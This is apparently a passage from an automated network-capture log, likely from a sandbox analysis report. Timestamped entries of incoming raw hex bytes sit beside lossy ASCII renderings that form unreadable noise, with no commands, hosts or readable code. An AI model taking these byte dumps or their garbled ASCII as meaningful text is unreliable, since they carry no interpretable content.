                                                                                                                                                2022-09-29 12:51:45 UTC19177INData Raw: fa 22 56 12 a2 81 d2 be 1d f2 37 a5 b5 66 25 0a e0 04 22 99 02 b8 61 87 0a aa 4d 30 04 54 61 59 ca 36 3e 37 09 ea ac e0 a2 f5 cf 87 30 3f 8c 58 06 3e 75 34 5b de ce 20 1d 16 76 c4 98 74 69 f7 b5 fa cd d1 8a 66 80 66 27 96 a5 48 38 a4 20 84 5f a7 3f 71 eb 99 63 bb 20 14 3d 09 78 65 84 26 6b d1 e2 ce 52 a4 26 ab d6 e5 b7 31 16 3e d6 68 26 7e f2 a1 75 7d 42 75 67 b9 92 38 7c 6d c1 98 23 10 e5 2a 90 86 d7 33 8f a6 37 95 68 0f e8 87 7d 32 a6 c9 87 0e bb 9e b7 ab e8 04 da df c7 4f 29 52 87 9c 26 78 96 d9 06 ae 32 32 29 57 22 7e f4 53 87 1f 16 e6 6e 78 e0 60 91 d9 b1 81 69 d4 93 b3 78 66 dd 25 74 f2 c1 50 3a c9 62 55 33 10 d6 43 5b b0 62 0d ef c3 ec ed 2e e0 0c 4a f7 0c 09 db fd 0a fd bc 86 65 61 cb 69 31 a9 b4 e4 ed d5 68 8e a3 4e bd 2e c0 bb 4e 65 26 71 07 9f
                                                                                                                                                Data Ascii: "V7f%"aM0TaY6>70?X>u4[ vtiff'H8 _?qc =xe&kR&1>h&~u}Bug8|m#*37h}2O)R&x22)W"~Snx`ixf%tP:bU3C[b.Jeai1hN.Ne&q
                                                                                                                                                2022-09-29 12:51:45 UTC19193INData Raw: 69 21 4a a7 2b e4 22 60 6a c8 0f d2 84 9a 41 83 de 0c 91 b5 92 bf 2f 99 c4 95 cd a7 d2 e5 70 eb 16 6b d1 56 21 5e 34 58 ab 11 ad 5b 60 37 46 f6 4d 12 a3 63 c1 1d 48 d8 f9 1f 4f 4d f5 8c 86 a6 8d 5b 52 ed fc a7 80 45 3c 58 88 f5 a7 c1 70 63 11 a7 85 40 29 0e dc cb 07 d7 10 04 1d e0 0b 67 ff 0d b3 ed 5a 2d dd 69 09 cb 30 0f 64 04 6b be d7 9c ee 2d 3a 4b 56 b6 40 8f cc 3c 6b 3f ec 2a 1d e7 d7 40 02 7c b9 a3 57 8d d8 9c f1 ad 03 0b 71 e8 08 2c e5 27 41 71 3a 62 44 44 e5 a8 84 0c 4b cb 9f 75 20 99 b6 9c 07 b1 d6 80 6b d8 b8 81 c1 76 e5 ea f0 8c 43 b6 53 a0 ef 09 da 07 74 4b 50 5d 1c 01 51 51 2f 7c 7a 72 f4 2c 19 af c0 c8 cd f7 9f 80 9f ed db 50 99 bd 7a a6 45 cd 83 f5 d3 17 b3 96 c4 57 f1 32 75 09 91 12 ba ad a8 a7 20 d8 71 54 13 13 ed f5 89 26 6b 5a 9f dc f7
                                                                                                                                                Data Ascii: i!J+"`jA/pkV!^4X[`7FMcHOM[RE<Xpc@)gZ-i0dk-:KV@<k?*@|Wq,'Aq:bDDKu kvCStKP]QQ/|zr,PzEW2u qT&kZ
                                                                                                                                                2022-09-29 12:51:45 UTC19209INData Raw: f0 d1 09 ab 96 4c 64 e0 04 5f 19 98 bc 61 d4 64 5c 08 2c 4b 4d b7 a3 8d 96 63 15 00 f7 30 c7 05 c0 a5 ed 34 79 a5 fe f5 57 00 d7 73 ce a4 21 d9 bf 50 2e a5 1d 8c 70 e2 06 bd c9 6a ee d7 e8 bc 17 71 2d a3 77 50 7d 05 eb 99 af 6f ee 69 21 5d a0 51 07 6b 63 ab d9 78 e0 07 fd 99 57 9e d6 61 ab 07 3c 65 6a dc ee 4d 98 13 02 35 47 49 de 19 2f 5c 3b 8b 4e 5b 97 ba 47 bb 8f b2 56 e8 8a 3a f2 8e 1d 4c 55 bf 50 1a 84 e7 88 3a ff 11 d1 f2 52 5f 3f a8 be 71 e3 1d c2 ad 1b ae 78 55 f0 13 4a b4 00 26 28 64 42 7e de a8 10 ea a6 ce ce 73 8e bf d1 03 9a a2 2b e9 a8 44 ec 9c d3 e6 ce fb 04 b0 8b 2c 75 cc ec e5 61 17 f5 6f ec 5f 10 49 f2 25 d5 f4 3a 2a c1 7d 93 4b da 2e a2 f1 4b 47 26 41 42 7b 3e 83 51 3a 44 d9 2e 1e ff 7b 36 4e 9f 14 a1 4e 67 75 4b 56 b2 d2 7d 2f 9f 19 c4
                                                                                                                                                Data Ascii: Ld_ad\,KMc04yWs!P.pjq-wP}oi!]QkcxWa<ejM5GI/\;N[GV:LUP:R_?qxUJ&(dB~s+D,uao_I%:*}K.KG&AB{>Q:D.{6NNguKV}/
                                                                                                                                                2022-09-29 12:51:45 UTC19225INData Raw: e4 d0 16 b6 96 8c c0 54 4f 17 b0 ff a4 c4 4a 61 3d 2a 1a 4f 5b f2 b2 59 a6 1b bb 11 f4 59 93 a1 0a 3e 44 cd 23 53 14 fe c3 b7 79 04 4e 4e 37 ac ee 46 a5 e3 bf 2e a9 94 ba cf ae c5 60 03 75 12 f2 30 32 9c 72 2b c8 a9 3b 51 c5 c4 16 82 7a 3b 81 8d ac 90 89 e3 88 b8 6f 4e d0 42 ae ea 84 5b df 9e a7 c3 01 92 fd 19 1c 70 a3 02 94 20 08 9f d3 b8 08 b4 78 10 e1 77 d2 a1 c3 d1 90 2e 76 98 e3 91 b4 44 6c ae 93 ba 60 f3 85 de b7 e1 79 15 12 ae 88 c8 0c 5a 7e 50 62 50 a8 de ba af e6 2e 19 39 81 40 66 59 1b af 2b a1 a3 92 49 c9 58 8a ea e9 a6 14 e3 28 c9 af d2 e1 f7 f5 81 9c 9b 17 8a 4d a5 5c a5 11 1b 04 e1 7a b5 25 11 ae 26 cb 95 1f c4 49 c1 c0 51 0d f3 2d ab e6 40 82 96 43 37 d5 73 1e d8 90 60 77 54 08 d7 4f 66 16 2a 02 68 d5 6e 14 fa 9c b0 e0 7f 31 53 a1 13 8e 9c
                                                                                                                                                Data Ascii: TOJa=*O[YY>D#SyNN7F.`u02r+;Qz;oNB[p xw.vDl`yZ~PbP.9@fY+IX(M\z%&IQ-@C7s`wTOf*hn1S
                                                                                                                                                2022-09-29 12:51:45 UTC19241INData Raw: 03 90 41 62 2d 3a 56 ef 6f c7 b4 5f 02 2f e1 40 ef 64 8a 9c 3c 6f aa 5e b5 cb 2b 96 8b 59 e8 48 f9 c6 2b 76 05 25 19 0e ac 0d 33 a4 14 4d 0d 7e eb 74 83 09 62 fa 68 02 08 00 eb 64 20 b8 4d df dd 67 07 63 c7 da 89 a1 5b 01 bb 4a ce 96 4f cd 7e 54 a6 dd 03 1e bc 5b cb 39 a7 13 7e 94 0a 93 52 d5 6f fa 31 eb 01 1a 49 f8 f1 d6 87 b1 7b 23 ad 69 c8 ef b6 3a b4 0b db 0f a8 34 ca 2c ef 56 69 e1 44 c2 ed 02 2d 37 5f 06 ea 0a 0a f3 c1 72 78 9f 70 41 d8 54 0b 41 f2 61 84 f8 05 d6 b0 41 22 6d 33 c7 4e fd 68 38 2e 98 ea ce dc 9f 21 57 9b 2d 10 79 0a 05 0d 3e 1d 5e 04 08 52 fd be d8 ce 30 70 3b 8d 57 19 f6 65 75 e0 12 e7 f7 a8 25 be 4f ae b1 9b 05 3e db 00 38 ee 60 14 39 a2 0b 74 e1 6e 9a 1e 23 d4 54 3e 05 4d b7 af 1a ed 0f 72 13 8c e5 a0 41 98 1d f4 0c d0 72 6a 16 8b
                                                                                                                                                Data Ascii: Ab-:Vo_/@d<o^+YH+v%3M~tbhd Mgc[JO~T[9~Ro1I{#i:4,ViD-7_rxpATAaA"m3Nh8.!W-y>^R0p;Weu%O>8`9tn#T>MrArj
                                                                                                                                                2022-09-29 12:51:45 UTC19257INData Raw: ac 35 8d 11 eb d6 28 9f 65 a4 be 25 d5 34 b6 d2 b9 36 84 d3 25 32 f8 b9 c0 94 97 fd ca 19 c3 bb 1f b7 20 b9 23 a3 03 f1 35 47 01 87 9a 13 02 d4 c6 c3 10 7e fa 9f 83 19 c7 28 e0 4e 20 b9 42 d1 d2 32 ca 13 df f9 c5 9b 82 3c 6c c8 20 db cc 1b 21 a3 f2 92 b2 37 58 fb d0 38 d5 d4 59 7a 29 13 85 e1 e4 0a 1c 9a e1 cf 2e 0b 25 df f1 ac 65 73 08 93 da 98 1f 26 33 40 cb 90 cf 04 f6 e6 51 05 42 8e 9a 38 37 73 07 58 aa 23 21 90 16 87 3b 8a 34 f4 a7 50 ff de 2b 3b be 37 b2 cd 9f d9 14 3a d4 f9 d7 95 eb 3d f9 26 65 a1 07 45 23 f3 5d 7e b7 a0 2c a1 30 83 8e 4c d9 33 7b ee 1d ac 9b d7 2b b7 70 4d b7 ae 61 ee fe 66 94 de 56 f2 70 36 c8 ee 05 85 86 55 30 4a be 38 79 91 1d 93 bf 56 5c 9e 58 20 65 ae 4b c2 01 1e 66 86 53 33 1a 79 48 5d 74 75 8e fe 8d 5d 8a aa d9 4a 6c 27 bb
                                                                                                                                                Data Ascii: 5(e%46%2 #5G~(N B2<l !7X8Yz).%es&3@QB87sX#!;4P+;7:=&eE#]~,0L3{+pMafVp6U0J8yV\X eKfS3yH]tu]Jl'
                                                                                                                                                2022-09-29 12:51:45 UTC19273INData Raw: 52 98 29 d9 0d e8 67 9f 37 bd c0 b4 1d 78 f8 63 76 b4 06 71 da d8 b5 4a c4 c6 8c 24 ef 0a 7d 1e ed 98 ba 4c 55 21 d8 a2 d1 c2 90 51 41 a3 07 6d 65 83 d7 f7 d9 7c 6a fc 3d f2 62 ec 5e eb 49 cc 24 c2 a5 97 b0 02 64 c3 9b 39 12 3b 64 3f 2c ce 73 31 5b 44 16 ef 4b db 41 43 70 a7 6f f0 14 9a b8 65 ab da 1f 7c 16 da 4b f1 ab ac 64 5a 11 fc 32 56 3c 7a 29 4b 4c a3 9c cf cb 36 74 09 c0 14 e5 a5 c8 ac 30 e2 12 b4 02 ab c3 e4 b0 13 7e 3c ed 48 a2 b3 2a 34 e8 0a f9 0b d3 ac e1 de cd 8e c1 65 be cd 9b d5 e4 48 a9 8d cb e7 6a 31 2d b6 bd 75 74 0a 9a d4 64 04 0b 65 61 f6 d5 49 0e 82 72 fb d4 17 65 15 b8 f9 58 7c 13 00 0f 8e 2c 86 28 ed 5d cf cf ba 5a ea 95 01 ae 40 f0 bd e4 d0 8d d2 fa 49 10 d7 53 96 a6 c9 a2 18 5f 5a 1d 45 37 6b d9 11 67 27 48 16 4a a1 3b 86 dd f9 c4
                                                                                                                                                Data Ascii: R)g7xcvqJ$}LU!QAme|j=b^I$d9;d?,s1[DKACpoe|KdZ2V<z)KL6t0~<H*4eHj1-utdeaIreX|,(]Z@IS_ZE7kg'HJ;
                                                                                                                                                2022-09-29 12:51:45 UTC19289INData Raw: 68 07 32 aa 39 c0 c6 07 f7 19 92 ab 5f f1 95 a8 46 99 68 39 e1 41 ed 03 71 64 f4 15 b4 ef 84 d1 c9 4f b1 6e 33 9b b7 53 39 2b a2 32 aa 45 0b 5b 5d c9 73 bb 37 d7 bd a1 a4 67 9c 44 27 e3 d5 8c 83 d7 b0 90 05 0d 95 d0 9c 81 f8 a0 49 0e 9d b7 cf 54 50 29 71 5d 52 40 36 ab 0b 8e 66 94 8f 2d b4 5f fa eb 43 bd b8 18 c6 1a 2d 6e 6b fe b9 7b 1f df c0 e8 e9 22 d4 01 69 34 c2 f6 6a bd 95 fa a1 20 b0 e8 13 55 56 f3 56 c8 e2 07 76 3a e1 2a c3 56 75 aa 20 92 92 4a 8e f1 f9 ee 68 b2 b9 82 02 24 23 cd 50 50 d2 db 3d 16 0c 24 9a 82 e4 42 ba 0b 34 b9 ca 0e d9 37 a9 5b 84 1f 54 ce 2d 81 dc 85 85 8c 69 9f d1 dd 8e 74 8b ae 8c 93 08 ad aa 5f 26 41 7b 90 e4 59 5c 1d 46 86 00 5c 26 cd 29 d9 b5 c0 c9 38 f0 34 fa 45 47 45 a3 d3 5d 6f ce 35 2b 98 34 9d 1e c5 f4 e6 1e 6c dc bc 80
                                                                                                                                                Data Ascii: h29_Fh9AqdOn3S9+2E[]s7gD'ITP)q]R@6f-_C-nk{"i4j UVVv:*Vu Jh$#PP=$B47[T-it_&A{Y\F\&)84EGE]o5+4l
                                                                                                                                                2022-09-29 12:51:45 UTC19305INData Raw: 96 3a b9 6b e0 9f 16 16 4f 46 03 c2 22 a4 cf c7 0d 0c b2 4a 7e 82 e9 86 d3 c0 6a 47 9f 0a 74 bb b5 49 f9 19 17 5d 12 b4 4f d5 51 94 5c b1 29 17 d8 88 95 22 79 e0 7b 67 96 50 1f 41 17 73 4d 5f 83 bd 84 21 4a 7f 71 b6 f6 e3 49 0b ef bc 4f c7 22 0b 4a 94 33 59 18 e8 4f df f3 0a ac 4a 3d da 0f e1 ab b8 c5 d5 9a 62 dd 45 84 17 e2 47 9e 31 3f 03 69 6c 24 4a 54 1e 51 aa 24 41 b1 7c 45 fc cf b6 79 ce 58 6b 7f 38 5b 3a ce a8 81 5c 1a 18 ed 06 99 bf 67 f8 82 42 7c 07 8e 49 4b 69 30 02 fd a8 3a 38 7c ef 1d 06 1a b7 40 e3 2a 71 cd 7a c7 7e 8b bf 6c ab b4 e2 32 0f 65 15 9c ed 73 d4 c2 01 1a 18 db da f1 b4 e8 75 a4 41 68 0f bb 5e 7e ff e9 36 63 49 5d 2e 60 66 34 fc de 4e 30 ad b1 71 6f d2 f1 0c d6 fe e2 2c dd 21 56 a0 c6 ac 06 59 4d f3 40 cd b8 9b 38 bb 6c 8b 88 5c 07
                                                                                                                                                Data Ascii: :kOF"J~jGtI]OQ\)"y{gPAsM_!JqIO"J3YOJ=bEG1?il$JTQ$A|EyXk8[:\gB|IKi0:8|@*qz~l2esuAh^~6cI].`f4N0qo,!VYM@8l\
                                                                                                                                                2022-09-29 12:51:45 UTC19321INData Raw: 77 25 49 35 77 2c 50 21 84 6c cc 49 82 79 ce c3 97 4d fd ad 6b c6 f1 55 34 ec b5 c9 19 c5 f9 14 30 c9 4b de 64 54 6f 61 5c b0 77 64 99 1e 67 8a 98 05 f9 69 26 24 ea 43 cc f6 d5 25 6f 36 cc 81 b0 0c 38 bf e1 75 59 3c 04 c5 08 62 d3 82 56 cc 1a 43 bc 65 27 37 9a 49 34 1a e9 30 ef 02 a0 df 9b 35 a3 d9 bd 91 0a 83 74 3c 96 0e 86 d5 f3 64 75 22 ea 33 d9 38 cd 56 4d ed d5 03 d8 8e ef 12 4e 27 c8 e3 0e 7d 64 9e 4c 8b 2c 8e 96 74 f7 a4 70 7d 97 34 66 7c 02 f0 a0 f5 a8 0a 39 d5 90 bc 81 f3 1d 5f 3d 05 c4 b5 a2 a3 52 63 19 d6 66 cb 13 af 73 21 d3 aa a5 f7 9b 51 77 12 d5 ff 7f d7 c1 d3 55 39 ed ae b4 d8 d1 2f 9d 8b d9 e4 4b 34 aa a5 70 96 9a 2e 4b b1 71 e5 7a a4 37 c7 22 f8 7f 7e 0d 9c 02 56 87 90 1f e2 0f aa aa 90 1d d4 c5 3a 27 37 13 15 19 7e fe 74 af 30 99 0c 73
                                                                                                                                                Data Ascii: w%I5w,P!lIyMkU40KdToa\wdgi&$C%o68uY<bVCe'7I405t<du"38VMN'}dL,tp}4f|9_=Rcfs!QwU9/K4p.Kqz7"~V:'7~t0s
                                                                                                                                                2022-09-29 12:51:45 UTC19337INData Raw: 8d d0 29 7e a2 76 56 93 13 1e ad ca e0 b4 41 f9 fb 84 59 d1 d6 59 5e 76 0e 0d b2 8f 9a ef 70 6f 98 0f fe 41 fb 9b 93 f1 61 d1 69 d2 81 0e de 54 94 28 d2 59 7f 89 57 6b 9f 7b ec 17 56 e4 1c a4 91 58 72 09 a0 69 9e b8 76 84 8d ca 67 bd 23 73 20 c0 c4 8c a9 a8 7f 72 9c 8c 46 7b 64 2d bc cd d1 07 e5 a7 54 d9 cb 66 60 d6 b4 54 b4 42 5a bc 84 3f 11 5d d9 60 f7 75 7b e2 d7 22 8f c8 aa 6a f2 b0 54 25 8b a8 ad d6 37 28 05 4e 13 f4 94 bf 20 36 86 e1 bb 69 4a e0 77 58 a4 90 fb de 7f 7f 75 b7 9e 2e 85 46 95 92 27 a0 83 61 2b 75 79 3a 1e 44 d7 8f 1b 82 77 c8 55 e1 cd c8 ad 35 5d 3c 0f 84 3e 0a 97 8c d2 98 a2 6b 9e fa c1 c2 8b 8a 27 1f 34 fd 33 88 f3 12 38 bf e9 35 5c 08 ce 0a 07 a9 18 28 1c 84 3c 52 39 22 62 be 20 60 4e ef 7e 94 0e 3e 5e db 98 60 27 80 c3 e8 b6 f4 8d
                                                                                                                                                Data Ascii: )~vVAYY^vpoAaiT(YWk{VXrivg#s rF{d-Tf`TBZ?]`u{"jT%7(N 6iJwXu.F'a+uy:DwU5]<>k'4385\(<R9"b `N~>^`'
                                                                                                                                                2022-09-29 12:51:45 UTC19353INData Raw: 8f 02 1d 8b 37 bd 26 1b 96 47 88 64 bc 4e cf 6d 38 a9 07 56 b6 e6 74 a3 64 0a f7 2b 6e 82 7c d3 f2 fe 67 b8 a3 ff 70 54 f9 ee 19 dd 61 1d 16 89 c8 f6 32 49 c8 ef 4e 9c 32 0d 0a 1d 79 0f 75 08 11 76 cf aa 74 5b 0f 3e ac c2 25 84 ef f7 ea dd 7e 63 34 b9 fa 67 50 c9 36 aa 14 25 2e 90 5c 21 c6 17 d8 5c 95 f4 99 7e 25 05 7f ca 05 be 50 16 a6 46 85 15 b8 81 99 fb 04 89 1d e3 6b 34 e2 9a 54 14 89 25 c2 5b 1b ec 08 3b 83 bf ea 2c 0d 5d b7 5a a1 d2 2d 70 f8 92 b4 5a 40 b9 f9 76 d4 be f5 83 87 8d 05 69 39 e4 34 37 66 65 de 8a 25 94 dc f0 ed 3a ff 3f 56 71 e8 80 25 57 b5 63 80 39 5f 18 68 29 3b 4f fc c3 71 f8 6b 0b 51 0a f6 7d 2d 3d 16 f9 b4 11 bd 2e 9c 4e 16 25 b1 35 db 96 6d 68 6b 07 50 ab 79 9c e8 e0 e7 42 dc c8 e8 43 63 b7 21 e7 ea 93 de d6 21 f1 d5 d1 8b ec 6c
                                                                                                                                                Data Ascii: 7&GdNm8Vtd+n|gpTa2IN2yuvt[>%~c4gP6%.\!\~%PFk4T%[;,]Z-pZ@vi947fe%:?Vq%Wc9_h);OqkQ}-=.N%5mhkPyBCc!!l
                                                                                                                                                2022-09-29 12:51:45 UTC19369INData Raw: 21 1c 27 e4 57 3d 28 91 96 16 ba 9a ee 48 6a 5c bf 75 8b ff 1c f3 48 c9 9c 73 0d 44 3d c0 54 9d 68 5c b4 d4 93 50 b3 a7 5b 8f 73 2a 7b 54 eb 67 af b8 a7 3c 7f 43 ab 57 6e c3 70 dc d1 90 e0 6e a6 c0 f6 80 2c 19 ca b8 c8 19 ba cf 7b 42 b8 12 45 db 99 9b 2e 26 8c b3 26 11 95 be 68 1c 14 84 43 32 ae 4e 3b 86 a1 3a a8 6f 8e 1f fd 19 20 df 39 23 af 60 dd e8 64 2a c8 2f 01 66 7b d5 cf b8 59 9f 7c 58 9d af 93 89 6c 13 8e 51 61 90 11 37 09 ae d1 92 29 41 41 16 1e 5a cb 78 f1 3e b3 67 d8 7f 84 2e 3f 55 16 a0 53 52 e3 e6 0b 45 9b f0 bb e9 1f d5 d6 f0 b1 0c 03 a1 79 c4 e1 2d 4e 6b a9 e5 7f 58 76 e4 ad 55 7a e7 cf 2f 65 41 4a 7d 24 b6 18 94 ff 63 fd 45 58 2d 16 b5 05 04 5b ee 06 4b 5d ae fd 52 f0 80 db 28 a9 e4 1f 0c 0b 34 e2 68 d9 63 b9 b2 d6 25 90 6c 27 e0 be a1 1d
                                                                                                                                                Data Ascii: !'W=(Hj\uHsD=Th\P[s*{Tg<CWnpn,{BE.&&hC2N;:o 9#`d*/f{Y|XlQa7)AAZx>g.?USREy-NkXvUz/eAJ}$cEX-[K]R(4hc%l'
                                                                                                                                                2022-09-29 12:51:45 UTC19385INData Raw: 35 cd 42 3b 91 dc 73 7e 62 e7 7b b4 6c b2 ee 24 f0 6d 24 5b 46 2a e0 9b c5 e6 b4 e2 90 1d af 1a ec 80 10 df a4 95 fe ee 8b 21 da f6 26 65 26 04 a0 06 e2 3c d8 42 29 b0 ff 94 89 0a 94 97 a2 d8 80 a2 39 c0 8e 85 30 3d 2f 23 38 70 c3 8c 65 35 79 48 e6 ae c7 2e 64 fd 66 99 5f e6 42 96 30 87 f4 4e 67 9d 71 52 27 35 e8 64 90 9d 86 eb 7a 37 62 1f f4 71 b2 8b 1f ee 6e 00 35 d3 86 ec 9a 6f 7b a4 8d cb 48 77 85 6c b0 d4 c4 65 55 91 b0 04 90 9d 84 5f 00 a2 b1 7f f9 eb 18 cd 04 0f fb cc b8 0e 80 d8 5e 65 22 6f 50 c0 f9 f4 9a 3e ea 00 21 f4 40 52 bb 55 e8 01 da 88 0d 7e 85 88 72 60 f7 d0 3f ee 89 04 6e 0b 25 ef 34 f3 e3 2f 65 69 7b 6b 16 9f 0c a7 e0 52 dd 6a 43 58 63 94 49 26 39 2b 8f 1e 91 0e 96 a7 f0 09 bf c7 c2 11 f9 22 6a cd d5 4d 04 08 dc f7 f5 06 b2 e0 64 5b e7
                                                                                                                                                Data Ascii: 5B;s~b{l$m$[F*!&e&<B)90=/#8pe5yH.df_B0NgqR'5dz7bqn5o{HwleU_^e"oP>!@RU~r`?n%4/ei{kRjCXcI&9+"jMd[
                                                                                                                                                2022-09-29 12:51:45 UTC19401INData Raw: 50 0a bc 99 74 97 94 37 35 82 e1 54 2f 2d 30 33 d0 b6 2f a2 7d 53 48 74 2f 0e 8c 20 98 26 c0 6c b8 0c 45 da d2 c3 4a fd ae 75 cd a4 dc c6 2e 82 7f 28 0e 7e 23 9c 0a 02 dd 5b 7e 71 39 fa dc 0b a0 85 11 9c 01 03 61 8e 93 aa 2c 86 67 66 3c 7c 54 43 a8 64 93 72 9a bc 1c 08 3c 4d 4f 0c 33 f9 c5 27 08 27 82 68 73 46 ae 2e bf c8 e0 b5 bb 8d e6 bf 99 3e 15 5c 75 46 12 c1 bf 9a 80 e1 90 01 76 ab 95 68 38 1f 1b d8 c9 01 22 84 e6 fb 59 e6 99 63 60 d9 c8 be 09 10 2f 27 a0 71 4f 95 e8 87 1c 21 75 e7 c6 8e 9c 01 71 bc d7 77 c8 d7 6f 68 b7 b5 bd bf 6a e5 c7 25 1b 04 4e 80 b6 e5 72 53 74 33 fa 73 3e 88 4b be 2e b7 55 56 f3 1f 6b a3 97 b4 81 12 79 d3 96 9f f4 9a 58 56 b6 15 3a eb d9 f0 a8 25 b7 71 4b cf df a3 2d 03 e2 34 a4 41 9a 2b 20 54 b5 cd 82 31 e0 af 1d 4f be 12 71
                                                                                                                                                Data Ascii: Pt75T/-03/}SHt/ &lEJu.(~#[~q9a,gf<|TCdr<MO3''hsF.>\uFvh8"Yc`/'qO!uqwohj%NrSt3s>K.UVkyXV:%qK-4A+ T1Oq
                                                                                                                                                2022-09-29 12:51:45 UTC19417INData Raw: f2 4c ae d7 ad 1c a8 60 bf 80 aa b8 fa de f8 4f 10 81 c5 d5 c6 95 e5 53 4b db 20 58 a9 14 71 15 7b 31 5b ca 45 e5 9c 3e 6e 1b 08 96 cd ff 1c 25 42 cd b3 07 51 89 ff 00 27 1a 9e 44 45 a0 57 69 8d 27 51 e9 d9 b4 34 c2 05 51 2b db 84 99 ec e3 e8 10 d0 9a ad d1 4d b5 70 99 91 da 08 bd 5e ec fc 86 56 e9 0a b5 d3 dc e5 a0 7d 00 81 8c a3 76 53 06 d0 9c 9e 7d 62 dd b8 b1 0a 69 1b ea a9 e0 cc 11 08 25 55 0b 0a 81 78 20 0d 28 83 0a f9 57 0a f5 c8 86 da 59 01 f5 65 d6 32 84 d6 e9 70 13 0e b0 0c 3e bb 91 bd 0f 3c 30 2a ef ed 13 ff bd 72 a4 99 b6 5c cf cb f2 cb ce 9a 61 81 57 cf 0c 4e 67 94 d6 e9 e6 9a 22 76 c7 43 7e 4d 5b 8a 12 17 42 87 e1 7b cc cc b8 c2 fc d6 cb a0 64 d5 0a 48 aa 06 a7 86 00 7b 5a 41 db 47 76 88 4a 3e ff 2a 9a 83 95 db f1 a6 c2 e6 b2 b1 4a 3c f1 49
                                                                                                                                                Data Ascii: L`OSK Xq{1[E>n%BQ'DEWi'Q4Q+Mp^V}vS}bi%Ux (WYe2p><0*r\aWNg"vC~M[B{dH{ZAGvJ>*J<I
                                                                                                                                                2022-09-29 12:51:45 UTC19433INData Raw: 3d 5f 47 24 16 ae 51 8d b9 4d ab 78 02 ff e8 3f 63 53 f0 e7 29 47 58 3a a5 c1 bc e5 35 4c 51 43 27 df 58 56 b2 27 49 ea d4 c3 50 8c 63 7a 55 61 75 50 6f 70 78 56 13 fb 7d de 38 d1 dd 2a 21 0b 66 9a 13 b9 81 b2 9d f4 93 ae 21 35 e0 ac a7 34 3a ad c6 83 32 e6 03 d8 49 cd e5 ef c6 d0 bb 7c ec 7d fb 70 2c 7f a8 bd 45 82 a4 dd bc 79 48 ed 12 1e 8d 93 df 3b cb 56 55 84 cf 36 5c fe a2 5c c9 b2 7a 3b 1d 2c f5 82 0a 99 d3 09 9d 04 97 43 8a cd 1c c5 d3 66 a8 27 62 f6 b9 3f a7 d3 5f e0 5c c6 aa c2 d6 dd 40 12 1f 9a 7f 29 f6 ec a1 98 52 a4 78 a1 84 37 24 6d 47 2c 59 ef 48 e6 24 f3 97 a0 34 60 b4 47 da 1b 1b 34 46 b6 1c 99 03 76 5f 8e 0e f6 ac 0a c6 87 ea 4c 67 a2 40 99 b7 2d 7d c8 15 8f 60 53 c9 de ac 1c 29 3a 05 71 e4 4f 97 d4 7e 37 45 b5 1d 19 41 ca fd ea eb 7a 63
                                                                                                                                                Data Ascii: =_G$QMx?cS)GX:5LQC'XV'IPczUauPopxV}8*!f!54:2I|}p,EyH;VU6\\z;,Cf'b?_\@)Rx7$mG,YH$4`G4Fv_Lg@-}`S):qO~7EAzc
                                                                                                                                                2022-09-29 12:51:45 UTC19449INData Raw: aa c9 33 e9 0e c7 33 38 35 c1 c0 5a 49 fa 63 4d 13 38 0e 38 55 3f a5 da 50 92 1d 6e 97 d4 85 22 dd f1 26 94 d0 9c 08 69 c9 b8 cd 5b d4 9b 33 bf 14 b3 7f 93 44 7f a7 4e ea 84 52 e0 e6 72 e5 20 30 22 16 ac 95 25 6e 00 11 dd 70 f5 73 e7 67 b7 06 3d c7 29 09 20 bf f4 02 ea c6 15 95 28 a2 70 70 10 c8 a6 46 19 e7 53 26 b6 ec a1 60 bd 7e df ac 1c 9f df 63 60 ce 62 34 99 f0 f8 1e f6 b9 58 96 a4 6f 94 2a 59 8f ba 18 4d 32 09 57 82 e7 97 75 a6 56 fa d7 82 39 bb dd 11 4d 7c c8 37 b3 f0 16 ab 1b 8c 7e a5 88 f3 d9 90 6d 7a 15 d2 5e d5 d3 3e 28 be b6 dd 66 4e 46 9e eb e5 1e 7c 59 3d cd 54 62 25 d1 9f bf a7 f6 4c f2 1f 6f 7f 29 1c 5c fc 75 01 6f 16 46 05 0e 9f d5 3b a8 80 db 96 44 5a fa 4f 3e eb 92 43 2e ab ab f3 52 6b 08 23 75 40 84 6e 3d f4 a0 64 63 0a 09 a2 ec d1 32
                                                                                                                                                Data Ascii: 3385ZIcM88U?Pn"&i[3DNRr 0"%npsg=) (ppFS&`~c`b4Xo*YM2WuV9M|7~mz^>(fNF|Y=Tb%Lo)\uoF;DZO>C.Rk#u@n=dc2
                                                                                                                                                2022-09-29 12:51:45 UTC19465INData Raw: 43 d3 4a a8 15 7b 90 d3 48 24 4c b9 ba b2 ec 9f 8b 00 ba 59 87 7e 8f a1 da f7 23 92 43 34 6e ec 46 e0 fc a5 4d 75 56 4d 54 a3 c0 96 69 16 8e b1 28 f4 90 3e 30 65 f3 aa cc 2f f3 96 85 5b 55 c5 7e a8 e5 ec 85 5e 9a cc 5d 45 25 f5 f6 72 d6 13 7c af a7 68 19 e6 a2 36 d9 fc 9c e3 e7 2f 1a 7b 9b 58 c9 23 75 36 20 e4 ad 69 3e 79 01 33 b2 00 dc 01 96 69 45 ae 3d f3 d7 ac bb 67 29 13 57 42 2b d5 e5 c6 8d 11 7d b7 1e 96 5c cc 6e ff a1 8d a2 34 78 0e 0e 66 5a 3b fd 0c 1a d9 96 d9 eb 3d 98 90 7f 2e 8e 17 ab 00 c6 4d 2f de 78 f7 9e 07 1c 29 6c 76 57 94 2c 43 60 6e 7e 38 1e 6f 6d 93 42 d2 6f 2a d5 df 70 56 bc 5e 64 60 5b aa d5 be 8b 27 65 43 65 f5 cb d1 47 5f 94 8b 21 6b 53 cd 72 c7 bf 4d 62 01 ae 1f 5f fa f8 b2 cf 6b 0c 86 14 33 bc 55 48 89 a5 64 bf 98 9d e0 89 3d 96
                                                                                                                                                Data Ascii: CJ{H$LY~#C4nFMuVMTi(>0e/[U~^]E%r|h6/{X#u6 i>y3iE=g)WB+}\n4xfZ;=.M/x)lvW,C`n~8omBo*pV^d`['eCeG_!kSrMb_k3UHd=
